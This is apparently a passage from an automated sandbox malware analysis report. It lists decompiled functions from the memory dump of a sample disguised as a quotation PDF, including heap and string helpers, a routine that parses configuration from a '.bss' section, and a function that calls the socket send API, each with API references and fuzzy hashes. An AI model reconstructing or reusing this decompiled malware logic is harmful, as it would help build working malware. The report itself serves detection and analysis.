					E004066FC(_t63,  &_v52);
					E0040BA16(__eflags,  &_v44, _t63, _t63,  &_v12);
					_v16 = E00401546(_a4);
					_v20 = E004066AB( &_v44);
					_t43 =  *((intOrPtr*)(_v8 + 0xc));
					_v24 = _t43;
					__imp__#19(_v24, _v20, _v16, 0,  &_v12); // executed
					_v28 = _t43;
					__eflags = _v28 - 0xffffffff;
					if(_v28 != 0xffffffff) {
						_v36 = 1;
						E004066DA();
						E004066DA();
						return _v36;
					}
					_v32 = _v32 & 0x00000000;
					E004066DA();
					E004066DA();
					return _v32;
				}
				return 0;
			}

0x0040a95d
0x0040a967
0x0040a978
0x0040a981
0x0040a989
0x0040a995
0x0040a9a2
0x0040a9ab
0x0040a9bb
0x0040a9c6
0x0040a9cc
0x0040a9cf
0x0040a9dd
0x0040a9e3
0x0040a9e6
0x0040a9ea
0x0040aa05
0x0040aa0f
0x0040aa17
0x00000000
0x0040aa1c
0x0040a9ec
0x0040a9f3
0x0040a9fb
0x00000000
0x0040aa00
0x00000000

APIs

send.WS2_32(?,?,?,00000000), ref: 0040A9DD

Strings

nevergonnagiveyouup, xrefs: 0040A970

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: send
String ID: nevergonnagiveyouup
API String ID: 2809346765-3526031003
Opcode ID: 5b9a3f8519606c0fa25aaa9c3e549e37b9bd07fe61f48566b5dd39373ad59c4c
Instruction ID: 64f9bc87e9194ca67f4a73e2bab32bf8ffadac79a399f63d534897c4f56559cc
Opcode Fuzzy Hash: 5b9a3f8519606c0fa25aaa9c3e549e37b9bd07fe61f48566b5dd39373ad59c4c
Instruction Fuzzy Hash: 3B213671D10118AFCB04EBA1D846DEEBBB4AF14318F01453EE012B21D1EB39AA21CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00406830 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406830(signed int* __ecx, intOrPtr* _a4) {
				signed int* _v8;
				CHAR* _v12;
				signed int _v16;
				signed int _t20;

				_v8 = __ecx;
				E0040B7DF( *_v8); // executed
				 *_v8 =  *_v8 & 0x00000000;
				if( *_a4 != 0) {
					_t20 = E0040B727(_a4, E00406AB8(_a4), 0x3000); // executed
					 *_v8 = _t20;
					_v12 = E00406B4A(_a4);
					_v16 =  *_v8;
					_t12 =  &_v16; // 0x406eef
					lstrcatA( *_t12, _v12);
				}
				return _v8;
			}

0x00406836
0x0040683e
0x00406847
0x00406850
0x00406860
0x0040686a
0x00406874
0x0040687c
0x00406882
0x00406885
0x00406885
0x0040688f

APIs

Part of subcall function 0040B7DF: VirtualFree.KERNELBASE(?,00000000,00008000,?,00406BF3,004241D6,0042419E,?,0040B464,004241A6,?,00420A5E,?,?,004241D6), ref: 0040B7EC

Part of subcall function 00406AB8: lstrlenA.KERNEL32(?,00406F0C,00406F0C,?,00406BBE,00003000,?,?,00406F0C,?,?,?,?,0040975B), ref: 00406ACD

Part of subcall function 0040B727: VirtualAlloc.KERNEL32(00000000,?,0040B08C,00000004,?,?,?,00406B80,00000000,?,0040B08C,.bss,?), ref: 0040B736
Part of subcall function 0040B727: GetLastError.KERNEL32(?,?,?,00406B80,00000000,?,0040B08C,.bss), ref: 0040B745

lstrcatA.KERNEL32(n@,00000000,00406EEF,00000000,?,?,?,?,0040975B,?,?,?,?,?), ref: 00406885

Strings

n@, xrefs: 00406882

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Virtual$AllocErrorFreeLastlstrcatlstrlen
String ID: n@
API String ID: 1930525816-1771279141
Opcode ID: 0d86ae3faed06a1e2d89ab10e92b1103b2b87ed8dabffe8bb693a6e3607597da
Instruction ID: a11dba392b3634f566e09511684049d5e1505c5bcddea9586f394826b58ebe0b
Opcode Fuzzy Hash: 0d86ae3faed06a1e2d89ab10e92b1103b2b87ed8dabffe8bb693a6e3607597da
Instruction Fuzzy Hash: AF01EC75A00208EFCB05EFA8D951A9CBBF5EF45344F1040BAF505AB2A0CB35AE51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041EA3F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041EA3F(void* __eflags, intOrPtr _a4) {
				WCHAR* _v8;
				char _v12;
				char _v16;
				long _v20;
				void* _t17;

				_v8 = E00401000(0x7d0);
				E00406F52( &_v12);
				_v20 = GetModuleFileNameW(0, _v8, 0x3e8);
				_t17 = E00406F64( &_v16, _v8); // executed
				E00406BFC( &_v12, _t17); // executed
				E00406BE2(); // executed
				E00401014(_v8);
				E00406FBC(_a4,  &_v12); // executed
				E00406BE2(); // executed
				return _a4;
			}

0x0041ea50
0x0041ea56
0x0041ea6b
0x0041ea74
0x0041ea7d
0x0041ea85
0x0041ea8d
0x0041ea9a
0x0041eaa2
0x0041eaab

APIs

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,02800000,0042212F,02800000,?,?,00424121,?,00000000), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00424121,?,00000000), ref: 0040100D

GetModuleFileNameW.KERNEL32(00000000,?,000003E8,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,dBB), ref: 0041EA65

Part of subcall function 00406F64: lstrlenW.KERNEL32( B,00003000,00000000,?,004220E3,?), ref: 00406F73
Part of subcall function 00406F64: lstrlenW.KERNEL32(0000000A,004220E3,?), ref: 00406F8D
Part of subcall function 00406F64: lstrcpyW.KERNEL32 ref: 00406FAF

Part of subcall function 00406BFC: lstrcpyW.KERNEL32 ref: 00406C46

Part of subcall function 00401014: GetProcessHeap.KERNEL32(00000000,?,004220FC,?,00000000,?), ref: 0040101A
Part of subcall function 00401014: HeapFree.KERNEL32(00000000), ref: 00401021

Part of subcall function 00406FBC: lstrcpyW.KERNEL32 ref: 00406FF9

Strings

dBB, xrefs: 0041EA3F

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Heap$lstrcpy$Processlstrlen$AllocateFileFreeModuleName
String ID: dBB
API String ID: 2990595109-3926046677
Opcode ID: 91563afb81d537c130bf32a5668f6f53c48acf25cd262f0f9ef4eb3f8c5769b2
Instruction ID: 942bbac82a91c58de205edd7bde6d8d8d66273bca75956af93b8433726f97ac7
Opcode Fuzzy Hash: 91563afb81d537c130bf32a5668f6f53c48acf25cd262f0f9ef4eb3f8c5769b2
Instruction Fuzzy Hash: 2BF0EC71904109BBCB05FFA1E842ADDBB74AF04308F5141BEB106B61E1DF746B55DA58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B047 Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 281
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B047(intOrPtr* __ecx, void* __eflags) {
				signed int _v8;
				intOrPtr* _v12;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				char _v132;
				char _v204;
				void* _t171;
				void* _t187;
				void* _t201;
				void* _t282;
				void* _t354;

				_t354 = __eflags;
				_v12 = __ecx;
				Sleep(0x1f4); // executed
				E0041F607( &_v204, _t354); // executed
				_v52 = E00422080( &_v204);
				E0041F46C( &_v204, _v52); // executed
				_t171 = E00406B58( &_v56, ".bss"); // executed
				E0041F3D3( &_v204,  &_v132, _t171); // executed
				E00406B06(); // executed
				E004063F4(_v12 + 0x50, E00403150( &_v132,  &_v84));
				E004066DA();
				_v8 = _v8 & 0x00000000;
				E0040AF15(_v12, _t354,  &_v20);
				_v24 = E004066B9( &_v20, 0);
				_v8 = _v8 + 4;
				_t187 = E00422091(_t354,  &_v60, E004066AB( &_v20) + _v8, _v24); // executed
				E00406BFC(_v12 + 0x10, _t187); // executed
				E00406BE2();
				_v8 = _v8 + _v24;
				 *((intOrPtr*)(_v12 + 0x14)) = E004066B9( &_v20, _v8);
				_v8 = _v8 + 4;
				_v28 = E004066B9( &_v20, _v8);
				_v8 = _v8 + 4;
				_t201 = E00422091(_t354,  &_v64, E004066AB( &_v20) + _v8, _v28); // executed
				E00406BFC(_v12 + 0x18, _t201);
				E00406BE2();
				_v8 = _v8 + _v28;
				 *((intOrPtr*)(_v12 + 0x1c)) = E004066B9( &_v20, _v8);
				_v8 = _v8 + 4;
				_v32 = E004066B9( &_v20, _v8);
				_v8 = _v8 + 4;
				E00406BFC(_v12 + 0x30, E00422091(_t354,  &_v68, E004066AB( &_v20) + _v8, _v32));
				E00406BE2();
				_v8 = _v8 + _v32;
				 *((intOrPtr*)(_v12 + 0x20)) = E0040636C( &_v20, _v8);
				_v8 = _v8 + 1;
				_v36 = E004066B9( &_v20, _v8);
				_v8 = _v8 + 4;
				E00406BFC(_v12 + 0x24, E00422091(_t354,  &_v72, E004066AB( &_v20) + _v8, _v36));
				E00406BE2();
				_v8 = _v8 + _v36;
				 *((intOrPtr*)(_v12 + 0x28)) = E0040636C( &_v20, _v8);
				_v8 = _v8 + 1;
				_v40 = E004066B9( &_v20, _v8);
				_v8 = _v8 + 4;
				E00406BFC(_v12 + 0x2c, E00422091(_t354,  &_v76, E004066AB( &_v20) + _v8, _v40));
				E00406BE2();
				_v8 = _v8 + _v40;
				 *((intOrPtr*)(_v12 + 0x34)) = E004066B9( &_v20, _v8);
				_v8 = _v8 + 4;
				 *((intOrPtr*)(_v12 + 0x3c)) = E0040636C( &_v20, _v8);
				_v8 = _v8 + 1;
				 *((intOrPtr*)(_v12 + 0x40)) = E0040636C( &_v20, _v8);
				_v8 = _v8 + 1;
				 *((intOrPtr*)(_v12 + 0x44)) = E0040636C( &_v20, _v8);
				_v8 = _v8 + 1;
				 *((intOrPtr*)(_v12 + 0x48)) = E0040636C( &_v20, _v8);
				_v8 = _v8 + 1;
				 *((intOrPtr*)(_v12 + 0x4c)) = E0040636C( &_v20, _v8);
				_v8 = _v8 + 1;
				_v44 = E004066B9( &_v20, _v8);
				_v8 = _v8 + 4;
				E00422091(_t354,  &_v48, E004066AB( &_v20) + _v8, _v44); // executed
				_v8 = _v8 + _v44;
				E00406BFC(_v12 + 0x38,  &_v48); // executed
				 *_v12 = 1;
				 *((intOrPtr*)(_v12 + 4)) = 1;
				E00406BE2();
				E004066DA();
				E0040316D( &_v132);
				_t282 = E00403181( &_v204); // executed
				return _t282;
			}

0x0040b047
0x0040b050
0x0040b058
0x0040b064
0x0040b06e
0x0040b07a
0x0040b087
0x0040b097
0x0040b09f
0x0040b0b7
0x0040b0bf
0x0040b0c4
0x0040b0cf
0x0040b0de
0x0040b0e7
0x0040b0fd
0x0040b10c
0x0040b114
0x0040b11f
0x0040b130
0x0040b139
0x0040b147
0x0040b150
0x0040b166
0x0040b175
0x0040b17d
0x0040b188
0x0040b199
0x0040b1a2
0x0040b1b0
0x0040b1b9
0x0040b1de
0x0040b1e6
0x0040b1f1
0x0040b202
0x0040b209
0x0040b217
0x0040b220
0x0040b245
0x0040b24d
0x0040b258
0x0040b269
0x0040b270
0x0040b27e
0x0040b287
0x0040b2ac
0x0040b2b4
0x0040b2bf
0x0040b2d0
0x0040b2d9
0x0040b2ea
0x0040b2f1
0x0040b302
0x0040b309
0x0040b31a
0x0040b321
0x0040b332
0x0040b339
0x0040b34a
0x0040b351
0x0040b35f
0x0040b368
0x0040b37e
0x0040b38c
0x0040b399
0x0040b3a1
0x0040b3aa
0x0040b3b4
0x0040b3bc
0x0040b3c4
0x0040b3cf
0x0040b3d5

APIs

Sleep.KERNEL32(000001F4), ref: 0040B058

Part of subcall function 00406B58: lstrlenA.KERNEL32(?,?,?,0040B08C,.bss,?), ref: 00406B62
Part of subcall function 00406B58: lstrlenA.KERNEL32(?,00003000,?,0040B08C,.bss,?), ref: 00406B74
Part of subcall function 00406B58: lstrcpyA.KERNEL32(?,?,0040B08C,.bss,?), ref: 00406B8F

Part of subcall function 00406BFC: lstrcpyW.KERNEL32 ref: 00406C46

Strings

.bss, xrefs: 0040B07F

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: .bss
API String ID: 507064821-3890483948
Opcode ID: e88a6e883dfdddc1f0bc9f6d14ad7590b01a506fed2b1f028e053d144ce1b134
Instruction ID: d223948d3a7bb9d07952ff4c01b18bede7befed89927b02c19011b6122cb08aa
Opcode Fuzzy Hash: e88a6e883dfdddc1f0bc9f6d14ad7590b01a506fed2b1f028e053d144ce1b134
Instruction Fuzzy Hash: 0DC1A3B1D00119EFDF04EFA5C991AEDBBB4FF04308F1000AAE506B7292EA35AB55DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00406E4B Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406E4B(intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				char* _v12;
				char _v16;
				int _v20;
				int _v24;
				short* _v28;
				int _v32;
				short* _v36;
				char _v40;
				char* _t40;
				intOrPtr* _t45;

				_v8 = __ecx;
				E0040691E( &_v16);
				if( *_v8 != 0) {
					_v24 = E00406F1B(_v8);
					_v28 =  *_v8;
					_v20 = WideCharToMultiByte(0, 0x200, _v28, _v24, 0, 0, 0, 0);
					_t40 = E0040B7F4(_v20, 0x3000); // executed
					_v12 = _t40;
					_v32 = E00406F1B(_v8);
					_v36 =  *_v8;
					WideCharToMultiByte(0xfde9, 0, _v36, _v32, _v12, _v20, 0, 0);
					_t45 = E00406B58( &_v40, _v12); // executed
					E00406830( &_v16, _t45); // executed
					E00406B06(); // executed
					E0040B7DF(_v12); // executed
				}
				E00406B9C(_a4,  &_v16); // executed
				E00406B06(); // executed
				return _a4;
			}

0x00406e51
0x00406e57
0x00406e62
0x00406e70
0x00406e78
0x00406e96
0x00406ea1
0x00406ea8
0x00406eb3
0x00406ebb
0x00406ed5
0x00406ee1
0x00406eea
0x00406ef2
0x00406efa
0x00406eff
0x00406f07
0x00406f0f
0x00406f18

APIs

Part of subcall function 00406F1B: lstrlenW.KERNEL32(00000000,?,?,?,00406FDE,00003000,?,?,00422109,?), ref: 00406F30

WideCharToMultiByte.KERNEL32(00000000,00000200,0040975B,?,00000000,00000000,00000000,00000000,?,?,?,0040975B,?,?,?,?), ref: 00406E90

Part of subcall function 0040B7F4: VirtualAlloc.KERNEL32(00000000,?,?,00000004,?,00406FE8,?,00003000,?,?,00422109,?), ref: 0040B801

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,0040975B,?,?,?,?), ref: 00406ED5

Part of subcall function 00406B58: lstrlenA.KERNEL32(?,?,?,0040B08C,.bss,?), ref: 00406B62
Part of subcall function 00406B58: lstrlenA.KERNEL32(?,00003000,?,0040B08C,.bss,?), ref: 00406B74
Part of subcall function 00406B58: lstrcpyA.KERNEL32(?,?,0040B08C,.bss,?), ref: 00406B8F

Part of subcall function 00406830: lstrcatA.KERNEL32(n@,00000000,00406EEF,00000000,?,?,?,?,0040975B,?,?,?,?,?), ref: 00406885

Part of subcall function 0040B7DF: VirtualFree.KERNELBASE(?,00000000,00008000,?,00406BF3,004241D6,0042419E,?,0040B464,004241A6,?,00420A5E,?,?,004241D6), ref: 0040B7EC

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: lstrlen$ByteCharMultiVirtualWide$AllocFreelstrcatlstrcpy
String ID:
API String ID: 346377423-0
Opcode ID: c227ba5be3c8948e4799add8d14f740c92c905ce210daabb1c905ca37142da1d
Instruction ID: 295e73a2929496ab7512ce5c35743337d72f2025b51fc58ccaafc9ed51e3cde2
Opcode Fuzzy Hash: c227ba5be3c8948e4799add8d14f740c92c905ce210daabb1c905ca37142da1d
Instruction Fuzzy Hash: 9C21CB71900109EFDB15EF95DD42FEDBBB1AF04304F20406AF202BA2E1DB756A54DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00406BFC Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406BFC(signed int* __ecx, intOrPtr* _a4) {
				signed int* _v8;
				WCHAR* _v12;
				signed int _v16;
				signed int _t17;

				_v8 = __ecx;
				 *_v8 =  *_v8 & 0x00000000;
				if( *_a4 != 0) {
					_t17 = E0040B727(_a4, E00406AE2(_a4), 0x3000); // executed
					 *_v8 = _t17;
					_v12 = E00406F44(_a4);
					_v16 =  *_v8;
					_t11 =  &_v16; // 0x4220ec
					lstrcpyW( *_t11, _v12);
				}
				return _v8;
			}

0x00406c02
0x00406c08
0x00406c11
0x00406c21
0x00406c2b
0x00406c35
0x00406c3d
0x00406c43
0x00406c46
0x00406c46
0x00406c50

APIs

Part of subcall function 0040B727: VirtualAlloc.KERNEL32(00000000,?,0040B08C,00000004,?,?,?,00406B80,00000000,?,0040B08C,.bss,?), ref: 0040B736
Part of subcall function 0040B727: GetLastError.KERNEL32(?,?,?,00406B80,00000000,?,0040B08C,.bss), ref: 0040B745

lstrcpyW.KERNEL32 ref: 00406C46

Strings

B, xrefs: 00406C43

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: AllocErrorLastVirtuallstrcpy
String ID: B
API String ID: 2695189922-3915878530
Opcode ID: 42f9b9682274868f88656829fe59bb9b5ac4eec5d2c605fe0cda25675d7882df
Instruction ID: 57111d09c376b0d4db55d49b0dffffb821c63be9eeb3435522ca4602b2561317
Opcode Fuzzy Hash: 42f9b9682274868f88656829fe59bb9b5ac4eec5d2c605fe0cda25675d7882df
Instruction Fuzzy Hash: F8F0F930A00208EFCB05EFA8D941A9DBBF4EF04304F1080A9E805AB2A0D7359E51DF48

Uniqueness

Uniqueness Score: -1.00%

Function 00421E50 Relevance: 3.0, APIs: 2, Instructions: 25
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00421E50(void* __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;

				Sleep(1); // executed
				_v8 = GetTickCount();
				_v8 = _v8 * 0x359 * _a12 + _v8;
				_v12 = _v8 % (_a8 + _a4);
				if(_v12 < 0) {
					_v12 = _v12 * 0xffffffff;
				}
				return _v12;
			}

0x00421e57
0x00421e63
0x00421e74
0x00421e84
0x00421e8b
0x00421e91
0x00421e91
0x00421e98

APIs

Sleep.KERNEL32(00000001,00000019,00000019,?,00421E2B,00000000,00002710,00000000,00000019,?,00424DFE,?,0000000A), ref: 00421E57
GetTickCount.KERNEL32 ref: 00421E5D

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: CountSleepTick
String ID:
API String ID: 2804873075-0
Opcode ID: 5c1fe378103682910bfb2f4659bd05cca948c2f4de496ed005ab96384a69d62e
Instruction ID: b650f566dda3a2b6367f3750a0d80dd989f5a0b982e1652f55d747491f2807f8
Opcode Fuzzy Hash: 5c1fe378103682910bfb2f4659bd05cca948c2f4de496ed005ab96384a69d62e
Instruction Fuzzy Hash: ABF09E70900209EFDB04DF98D985B9DBFF5FF48304F50809AE405A7251D770AB55DB14

Uniqueness

Uniqueness Score: -1.00%

Function 0040B88F Relevance: 3.0, APIs: 2, Instructions: 11
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B88F(void* _a4) {
				void* _t3;
				char _t5;

				if(_a4 != 0) {
					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
					return _t5;
				}
				return _t3;
			}

0x0040b896
0x0040b8a4
0x00000000
0x0040b8a4
0x0040b8ab

APIs

GetProcessHeap.KERNEL32(00000000,00000000,?,0040B8EA,0040470F,?,00403268,00000003,00000030,00000000), ref: 0040B89D
RtlFreeHeap.NTDLL(00000000,?,0040B8EA,0040470F,?,00403268,00000003,00000030,00000000), ref: 0040B8A4

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: b45d108cac919919819228d2086ad565a43b53b1dc6cdbaf4a682e51c27fa54c
Instruction ID: 83c7b48c94c535def0bb75e19857d2a1813b8a5e1574c52d3a0f2d65e2c6b6b0
Opcode Fuzzy Hash: b45d108cac919919819228d2086ad565a43b53b1dc6cdbaf4a682e51c27fa54c
Instruction Fuzzy Hash: 5BC01232104608ABDF106FA0E80CB993AACAB04742F808020FB0D485A0C7789490DA9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040B86A Relevance: 3.0, APIs: 2, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B86A(long _a4) {
				void* _t3;

				_t3 = RtlAllocateHeap(GetProcessHeap(), 8, _a4); // executed
				return _t3;
			}

0x0040b879
0x0040b880

APIs

GetProcessHeap.KERNEL32(00000008,00000000,?,0040B81B,0041F599,?,?,004065B3,00000000,0041F599,?,?,0041F599), ref: 0040B872
RtlAllocateHeap.NTDLL(00000000,?,0040B81B,0041F599,?,?,004065B3,00000000,0041F599,?,?,0041F599), ref: 0040B879

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: c5a1ae4415a5ed6618bba2ff8a9d7a0c1868b4228cdf360882df3e74902825c6
Instruction ID: 262063fe94da232aab4c3c50abcaa96e02db549898df681bd8389280e483d589
Opcode Fuzzy Hash: c5a1ae4415a5ed6618bba2ff8a9d7a0c1868b4228cdf360882df3e74902825c6
Instruction Fuzzy Hash: 80B09232241208BBDA106FF5EC0DA893F2EEB48A51F814420F70D85160CA72A055ABAD

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401000(long _a4) {
				void* _t3;

				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				return _t3;
			}

0x0040100d
0x00401013

APIs

GetProcessHeap.KERNEL32(00000000,02800000,0042212F,02800000,?,?,00424121,?,00000000), ref: 00401006
RtlAllocateHeap.NTDLL(00000000,?,?,00424121,?,00000000), ref: 0040100D

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: f077213481028747a34359ab80e31f14258f71c0c32561a1420f5a335c245a39
Instruction ID: 0d97fa13621a67fa754e1ac956b7555a639d41f32c22faf4d298647b2594f1ec
Opcode Fuzzy Hash: f077213481028747a34359ab80e31f14258f71c0c32561a1420f5a335c245a39
Instruction Fuzzy Hash: 71B01271705200ABDE109FF09E0CB093A26AB44F02F410810F30D80060C6305001FB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00406770 Relevance: 2.6, APIs: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406770(char** __ecx, void* __eflags, intOrPtr _a4) {
				char** _v8;
				short* _v12;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr* _t44;

				_v8 = __ecx;
				E00406F52( &_v16);
				if(E00406747(_v8) > 0) {
					_v24 = E00406747(_v8) + 2;
					_v28 =  *_v8;
					_v20 = MultiByteToWideChar(0, 2, _v28, _v24, 0, 0) << 1;
					_v12 = E00401000(_v20);
					_v36 = E00406747(_v8);
					MultiByteToWideChar(0xfde9, 0,  *_v8, 0xffffffff, _v12, _v20);
					_t44 = E00406F64( &_v32, _v12); // executed
					E00406BFC( &_v16, _t44); // executed
					E00406BE2(); // executed
					E00401014(_v12);
				}
				E00406FBC(_a4,  &_v16); // executed
				E00406BE2(); // executed
				return _a4;
			}

0x00406776
0x0040677c
0x0040678b
0x0040679b
0x004067a3
0x004067bc
0x004067c8
0x004067d3
0x004067ea
0x004067f6
0x004067ff
0x00406807
0x0040680f
0x00406814
0x0040681c
0x00406824
0x0040682d

APIs

Part of subcall function 00406747: lstrlenA.KERNEL32(00406789,00406DBD,00406DBD,?,00406789,?,?,?,?,?,00406CA1,?,00406DBD,?,?,00406DBD), ref: 0040675C

MultiByteToWideChar.KERNEL32(00000000,00000002,?,?,00000000,00000000,?,?,?,?,?,00406CA1,?,00406DBD), ref: 004067B4

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,02800000,0042212F,02800000,?,?,00424121,?,00000000), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00424121,?,00000000), ref: 0040100D

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00406DBD,000000FF,?,?,?,?,?,?,?,00406CA1,?,00406DBD), ref: 004067EA

Part of subcall function 00406F64: lstrlenW.KERNEL32( B,00003000,00000000,?,004220E3,?), ref: 00406F73
Part of subcall function 00406F64: lstrlenW.KERNEL32(0000000A,004220E3,?), ref: 00406F8D
Part of subcall function 00406F64: lstrcpyW.KERNEL32 ref: 00406FAF

Part of subcall function 00406BFC: lstrcpyW.KERNEL32 ref: 00406C46

Part of subcall function 00401014: GetProcessHeap.KERNEL32(00000000,?,004220FC,?,00000000,?), ref: 0040101A
Part of subcall function 00401014: HeapFree.KERNEL32(00000000), ref: 00401021

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Heap$lstrlen$ByteCharMultiProcessWidelstrcpy$AllocateFree
String ID:
API String ID: 1499482693-0
Opcode ID: 5d1f435c29715f36449fa34f164b444ca852645a6f2e8c07b1ad22d2d4a922b1
Instruction ID: 74013c9d31e34da6c640e744ab51bcff26cfec29e8c9767870c354b8b34d0fb9
Opcode Fuzzy Hash: 5d1f435c29715f36449fa34f164b444ca852645a6f2e8c07b1ad22d2d4a922b1
Instruction Fuzzy Hash: 4D21E571900109EFCB14EFA5DC42AADBB75AF08308F2041BAF512BA1E1DB346A55DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B809 Relevance: 2.5, APIs: 2, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B809(void* __ecx, void* _a4, long _a8) {
				signed int _v8;
				signed int _t16;

				if(_a4 != 0) {
					if(_a8 != 0) {
						_v8 = HeapReAlloc(GetProcessHeap(), 0, _a4, _a8);
					} else {
						E0040B853(_a4);
						_v8 = _v8 & 0x00000000;
					}
				} else {
					_t16 = E0040B86A(_a8); // executed
					_v8 = _t16;
				}
				return _v8;
			}

0x0040b811
0x0040b825
0x0040b84b
